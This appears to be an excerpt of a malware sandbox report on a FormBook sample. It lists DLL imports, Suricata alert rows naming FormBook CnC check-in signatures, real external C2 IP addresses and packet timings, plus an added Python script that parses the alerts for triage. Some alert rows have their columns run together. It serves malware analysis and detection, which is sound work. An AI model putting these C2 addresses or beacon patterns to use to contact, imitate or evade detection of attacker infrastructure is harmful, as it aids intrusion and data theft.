ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system  Country where language is spoken
English                         Great Britain
Timestamp                        SID      Signature                                     Severity  Source IP     Source Port  Dest IP         Dest Port  Protocol
2024-11-20T09:22:55.944955+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.10  49847        188.114.97.3    80         TCP
2024-11-20T09:22:55.944955+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.10  49847        188.114.97.3    80         TCP
2024-11-20T09:23:13.101182+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49961        23.167.152.41   80         TCP
2024-11-20T09:23:15.654759+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49977        23.167.152.41   80         TCP
2024-11-20T09:23:18.201777+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49978        23.167.152.41   80         TCP
2024-11-20T09:23:20.756097+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.10  49979        23.167.152.41   80         TCP
2024-11-20T09:23:20.756097+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.10  49979        23.167.152.41   80         TCP
2024-11-20T09:23:26.444406+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49981        66.29.132.194   80         TCP
2024-11-20T09:23:28.978112+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49982        66.29.132.194   80         TCP
2024-11-20T09:23:31.531235+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49983        66.29.132.194   80         TCP
2024-11-20T09:23:34.156224+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.10  49984        66.29.132.194   80         TCP
2024-11-20T09:23:34.156224+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.10  49984        66.29.132.194   80         TCP
2024-11-20T09:23:40.822235+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49985        202.92.5.23     80         TCP
2024-11-20T09:23:43.375631+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49986        202.92.5.23     80         TCP
2024-11-20T09:23:45.900366+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49987        202.92.5.23     80         TCP
2024-11-20T09:23:48.479087+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.10  49988        202.92.5.23     80         TCP
2024-11-20T09:23:48.479087+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.10  49988        202.92.5.23     80         TCP
2024-11-20T09:23:54.162947+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49989        194.195.220.41  80         TCP
2024-11-20T09:23:56.721604+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49990        194.195.220.41  80         TCP
2024-11-20T09:23:59.262057+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.10  49991        194.195.220.41  80         TCP
2024-11-20T09:24:01.854135+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.10  49992        194.195.220.41  80         TCP
2024-11-20T09:24:01.854135+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.10  49992        194.195.220.41  80         TCP
                                                                      2024-11-20T09:24:08.523389+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049993103.230.159.8680TCP
                                                                      2024-11-20T09:24:11.079279+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049994103.230.159.8680TCP
                                                                      2024-11-20T09:24:13.633467+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049995103.230.159.8680TCP
                                                                      2024-11-20T09:24:16.165792+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049996103.230.159.8680TCP
                                                                      2024-11-20T09:24:16.165792+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049996103.230.159.8680TCP
                                                                      2024-11-20T09:24:21.911913+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049997188.114.97.380TCP
                                                                      2024-11-20T09:24:24.418705+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049998188.114.97.380TCP
                                                                      2024-11-20T09:24:26.987576+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049999188.114.97.380TCP
                                                                      2024-11-20T09:24:29.562489+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050000188.114.97.380TCP
                                                                      2024-11-20T09:24:29.562489+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050000188.114.97.380TCP
                                                                      2024-11-20T09:24:35.861836+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050001118.107.250.10380TCP
                                                                      2024-11-20T09:24:38.486167+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050002118.107.250.10380TCP
                                                                      2024-11-20T09:24:41.033463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050003118.107.250.10380TCP
                                                                      2024-11-20T09:24:43.602677+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050004118.107.250.10380TCP
                                                                      2024-11-20T09:24:43.602677+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050004118.107.250.10380TCP
                                                                      2024-11-20T09:24:49.431121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050005209.74.77.10980TCP
                                                                      2024-11-20T09:24:51.957863+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050006209.74.77.10980TCP
                                                                      2024-11-20T09:24:54.511773+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050007209.74.77.10980TCP
                                                                      2024-11-20T09:24:57.083907+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050008209.74.77.10980TCP
                                                                      2024-11-20T09:24:57.083907+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050008209.74.77.10980TCP
                                                                      2024-11-20T09:25:02.842935+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050009188.114.96.380TCP
                                                                      2024-11-20T09:25:05.415107+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050010188.114.96.380TCP
                                                                      2024-11-20T09:25:07.927701+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050011188.114.96.380TCP
                                                                      2024-11-20T09:25:10.505272+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050012188.114.96.380TCP
                                                                      2024-11-20T09:25:10.505272+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050012188.114.96.380TCP
                                                                      2024-11-20T09:25:17.778747+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050013194.245.148.18980TCP
                                                                      2024-11-20T09:25:20.321559+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050014194.245.148.18980TCP
                                                                      2024-11-20T09:25:22.867338+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050015194.245.148.18980TCP
                                                                      2024-11-20T09:25:25.416699+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050016194.245.148.18980TCP
                                                                      2024-11-20T09:25:25.416699+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050016194.245.148.18980TCP
                                                                      2024-11-20T09:25:31.061041+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050017199.59.243.22780TCP
                                                                      2024-11-20T09:25:33.612403+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050018199.59.243.22780TCP
                                                                      2024-11-20T09:25:37.379541+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050019199.59.243.22780TCP
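The alert table above shows the check-in rhythm that is characteristic of this FormBook sample: for each host, three POST check-ins about 2.5 s apart followed by one GET (on which the ET rule 2050745 and the ETPRO rule 2855465 both fire, so the GET appears twice), then a move to the next host roughly 14 s later. The script below is an added example, not part of the Joe Sandbox report: it parses rows in the pipe-delimited column order used on this page, collapses the duplicate alerts on the same TCP flow, and prints the per-host check-in sequence and the host rotation interval. The embedded rows are a constructed excerpt of this report's table covering three of the hosts. Treat the resulting host list as candidate IOCs to triage rather than a confirmed C2 list: FormBook contacts decoy hosts alongside its real C2, and some addresses here sit in shared CDN space (188.114.96.0/20 is Cloudflare).

```python
"""Triage helper for a Joe Sandbox "Suricata IDS alerts" table (added example,
not part of the report). Column order: Timestamp | SID | Signature | Severity |
Source IP | Source Port | Dest IP | Dest Port | Protocol."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime

# Constructed excerpt of this report's alert table (three of the contacted hosts).
SAMPLE_ALERTS = """\
2024-11-20T09:23:13.101182+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49961 | 23.167.152.41 | 80 | TCP
2024-11-20T09:23:15.654759+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49977 | 23.167.152.41 | 80 | TCP
2024-11-20T09:23:18.201777+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49978 | 23.167.152.41 | 80 | TCP
2024-11-20T09:23:20.756097+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49979 | 23.167.152.41 | 80 | TCP
2024-11-20T09:23:20.756097+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49979 | 23.167.152.41 | 80 | TCP
2024-11-20T09:23:26.444406+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49981 | 66.29.132.194 | 80 | TCP
2024-11-20T09:23:28.978112+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49982 | 66.29.132.194 | 80 | TCP
2024-11-20T09:23:31.531235+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49983 | 66.29.132.194 | 80 | TCP
2024-11-20T09:23:34.156224+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49984 | 66.29.132.194 | 80 | TCP
2024-11-20T09:23:34.156224+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49984 | 66.29.132.194 | 80 | TCP
2024-11-20T09:23:40.822235+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49985 | 202.92.5.23 | 80 | TCP
2024-11-20T09:23:43.375631+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49986 | 202.92.5.23 | 80 | TCP
2024-11-20T09:23:45.900366+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49987 | 202.92.5.23 | 80 | TCP
2024-11-20T09:23:48.479087+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49988 | 202.92.5.23 | 80 | TCP
2024-11-20T09:23:48.479087+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49988 | 202.92.5.23 | 80 | TCP
"""

METHOD_RE = re.compile(r"Checkin \((GET|POST)\)")   # method named in the ET signature text
TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"                 # Joe Sandbox alert timestamp, e.g. +0100


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    signature: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str

    @property
    def method(self) -> str | None:
        m = METHOD_RE.search(self.signature)
        return m.group(1) if m else None


def parse_alerts(text: str) -> list[Alert]:
    """Parse pipe-delimited rows; a row with the wrong column count is rejected, not guessed."""
    alerts: list[Alert] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cols = [c.strip() for c in line.split("|")]
        if len(cols) != 9:
            raise ValueError(f"expected 9 columns, got {len(cols)}: {line!r}")
        ts, sid, sig, _severity, sip, sport, dip, dport, proto = cols
        alerts.append(Alert(datetime.strptime(ts, TS_FORMAT), int(sid), sig,
                            sip, int(sport), dip, int(dport), proto))
    return alerts


def flows(alerts: list[Alert]) -> list[Alert]:
    """One alert per TCP connection, earliest first. The ET and ETPRO GET rules
    fire on the same packet, so alerts sharing the 4-tuple collapse to the first."""
    first: dict[tuple[str, int, str, int], Alert] = {}
    for a in sorted(alerts, key=lambda a: a.ts):
        first.setdefault((a.src_ip, a.src_port, a.dst_ip, a.dst_port), a)
    return list(first.values())


def checkin_sequences(alerts: list[Alert]) -> dict[str, list[str]]:
    """HTTP methods seen per destination host, hosts in first-contact order."""
    seq: dict[str, list[str]] = {}
    for f in flows(alerts):
        seq.setdefault(f.dst_ip, []).append(f.method or "?")
    return seq


def c2_candidates(alerts: list[Alert]) -> list[str]:
    """Contacted hosts in contact order; candidates to triage, not a confirmed C2 list."""
    return list(checkin_sequences(alerts))


def rotation_intervals(alerts: list[Alert]) -> list[float]:
    """Seconds between the first contact of one host and the first contact of the next."""
    first_seen: dict[str, datetime] = {}
    for f in flows(alerts):
        first_seen.setdefault(f.dst_ip, f.ts)
    times = list(first_seen.values())
    return [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]


def matches_formbook_pattern(methods: list[str]) -> bool:
    """Check-in shape seen in this report: three POSTs then one GET per host."""
    return methods == ["POST", "POST", "POST", "GET"]


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)
    for host, methods in checkin_sequences(alerts).items():
        shape = "formbook check-in" if matches_formbook_pattern(methods) else "irregular"
        print(f"{host:16} {','.join(methods):20} {shape}")
    print("rotation intervals (s):", [round(x, 2) for x in rotation_intervals(alerts)])
```

Running it prints each host with `POST,POST,POST,GET` and rotation intervals of about 13.3 s and 14.4 s. Feeding it the full table from this page (copied in the same column layout) gives the complete contact order; a host whose sequence deviates from the three-POST-one-GET shape, or a rotation interval far from the others, is what to look at first when separating the live C2 from decoys.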
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 09:22:54.615077019 CET | 49847 | 80 | 192.168.2.10 | 188.114.97.3
Nov 20, 2024 09:22:54.622095108 CET | 80 | 49847 | 188.114.97.3 | 192.168.2.10
Nov 20, 2024 09:22:54.622237921 CET | 49847 | 80 | 192.168.2.10 | 188.114.97.3
Nov 20, 2024 09:22:54.631941080 CET | 49847 | 80 | 192.168.2.10 | 188.114.97.3
Nov 20, 2024 09:22:54.636826992 CET | 80 | 49847 | 188.114.97.3 | 192.168.2.10
Nov 20, 2024 09:22:55.944574118 CET | 80 | 49847 | 188.114.97.3 | 192.168.2.10
Nov 20, 2024 09:22:55.944843054 CET | 80 | 49847 | 188.114.97.3 | 192.168.2.10
Nov 20, 2024 09:22:55.944955111 CET | 49847 | 80 | 192.168.2.10 | 188.114.97.3
Nov 20, 2024 09:22:55.945255995 CET | 80 | 49847 | 188.114.97.3 | 192.168.2.10
Nov 20, 2024 09:22:55.945311069 CET | 49847 | 80 | 192.168.2.10 | 188.114.97.3
Nov 20, 2024 09:22:55.948215961 CET | 49847 | 80 | 192.168.2.10 | 188.114.97.3
Nov 20, 2024 09:22:55.954719067 CET | 80 | 49847 | 188.114.97.3 | 192.168.2.10
Nov 20, 2024 09:23:12.734633923 CET | 49961 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:12.744164944 CET | 80 | 49961 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:12.744304895 CET | 49961 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:12.760330915 CET | 49961 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:12.765171051 CET | 80 | 49961 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:13.100318909 CET | 80 | 49961 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:13.101181984 CET | 49961 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:14.270031929 CET | 49961 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:14.276576042 CET | 80 | 49961 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:15.288891077 CET | 49977 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:15.296773911 CET | 80 | 49977 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:15.298981905 CET | 49977 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:15.314382076 CET | 49977 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:15.321952105 CET | 80 | 49977 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:15.654606104 CET | 80 | 49977 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:15.654758930 CET | 49977 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:16.817131042 CET | 49977 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:16.822491884 CET | 80 | 49977 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:17.835656881 CET | 49978 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:17.842272043 CET | 80 | 49978 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:17.842475891 CET | 49978 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:17.856843948 CET | 49978 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:17.861933947 CET | 80 | 49978 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:17.861975908 CET | 80 | 49978 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:18.201672077 CET | 80 | 49978 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:18.201776981 CET | 49978 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:19.363795042 CET | 49978 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:19.368699074 CET | 80 | 49978 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:20.383347988 CET | 49979 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:20.388221025 CET | 80 | 49979 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:20.388314962 CET | 49979 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:20.397167921 CET | 49979 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:20.405914068 CET | 80 | 49979 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:20.755884886 CET | 80 | 49979 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:20.756097078 CET | 49979 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:20.756942034 CET | 49979 | 80 | 192.168.2.10 | 23.167.152.41
Nov 20, 2024 09:23:20.764127970 CET | 80 | 49979 | 23.167.152.41 | 192.168.2.10
Nov 20, 2024 09:23:25.815763950 CET | 49981 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:25.820791960 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:25.820894957 CET | 49981 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:25.835645914 CET | 49981 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:25.840503931 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:26.444169998 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:26.444343090 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:26.444375038 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:26.444406033 CET | 49981 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:26.444842100 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:26.444876909 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:26.444905996 CET | 49981 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:26.444910049 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:26.444953918 CET | 80 | 49981 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:26.444966078 CET | 49981 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:26.445008039 CET | 49981 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:27.348275900 CET | 49981 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:28.366799116 CET | 49982 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:28.373056889 CET | 80 | 49982 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:28.373162985 CET | 49982 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:28.387253046 CET | 49982 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:28.392962933 CET | 80 | 49982 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:28.977950096 CET | 80 | 49982 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:28.977981091 CET | 80 | 49982 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:28.977999926 CET | 80 | 49982 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:28.978111982 CET | 49982 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:28.978677988 CET | 80 | 49982 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:28.978702068 CET | 80 | 49982 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:28.978751898 CET | 49982 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:28.979187012 CET | 80 | 49982 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:28.979240894 CET | 49982 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:29.895893097 CET | 49982 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:30.913681030 CET | 49983 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:30.918812990 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:30.918991089 CET | 49983 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:30.933165073 CET | 49983 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:30.938560009 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:30.938618898 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:31.531133890 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:31.531155109 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:31.531167030 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:31.531234980 CET | 49983 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:31.531411886 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:31.531425953 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:31.531455040 CET | 49983 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:31.542376995 CET | 80 | 49983 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:31.542467117 CET | 49983 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:32.442009926 CET | 49983 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:33.468003035 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:33.472996950 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:33.473159075 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:33.481877089 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:33.486809969 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156001091 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156147003 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156158924 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156188011 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156207085 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156219959 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156224012 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:34.156230927 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156255960 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:34.156364918 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:34.156420946 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156435013 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156447887 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:34.156464100 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:34.156500101 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:34.160979033 CET | 49984 | 80 | 192.168.2.10 | 66.29.132.194
Nov 20, 2024 09:23:34.169207096 CET | 80 | 49984 | 66.29.132.194 | 192.168.2.10
Nov 20, 2024 09:23:39.862950087 CET | 49985 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:39.870692968 CET | 80 | 49985 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:39.870795012 CET | 49985 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:39.885498047 CET | 49985 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:39.890651941 CET | 80 | 49985 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:40.821815968 CET | 80 | 49985 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:40.822134972 CET | 80 | 49985 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:40.822235107 CET | 49985 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:40.822622061 CET | 80 | 49985 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:40.822714090 CET | 49985 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:41.395184040 CET | 49985 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:42.413764954 CET | 49986 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:42.418922901 CET | 80 | 49986 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:42.419028997 CET | 49986 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:42.432723999 CET | 49986 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:42.438982964 CET | 80 | 49986 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:43.374948978 CET | 80 | 49986 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:43.375422955 CET | 80 | 49986 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:43.375437975 CET | 80 | 49986 | 202.92.5.23 | 192.168.2.10
